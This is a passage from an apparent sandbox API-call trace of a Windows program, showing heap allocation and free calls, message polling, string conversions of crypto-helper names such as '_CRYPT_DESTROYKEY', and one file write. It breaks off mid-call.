lpsz="_CRYPT_SHUTDOWN") returned 0xf [0147.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0147.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.856] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0147.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0147.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0147.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0147.856] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0147.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0147.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0147.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0147.858] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0147.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0147.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0147.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0147.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0147.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0147.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0147.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0147.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0147.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f288d8 [0147.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f36408 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f288d8 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0147.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0147.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f288d8 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36408 | out: hHeap=0x970000) returned 1 [0147.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0147.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f36408 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f288d8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0147.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0147.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21b40 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0148.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1ada8 | out: hHeap=0x970000) returned 1 [0148.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0148.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0148.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0148.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2f670 | out: hHeap=0x970000) returned 1 [0148.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0148.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0148.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0148.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0148.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x3bf0050 [0148.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36408 | out: hHeap=0x970000) returned 1 [0148.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0148.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0148.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0148.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0148.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d90) returned 0x2f14010 [0148.228] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x6d90, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x6d90, lpOverlapped=0x0) returned 1 [0148.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0148.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0148.231] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0148.231] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0148.231] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0148.231] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0148.231] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, 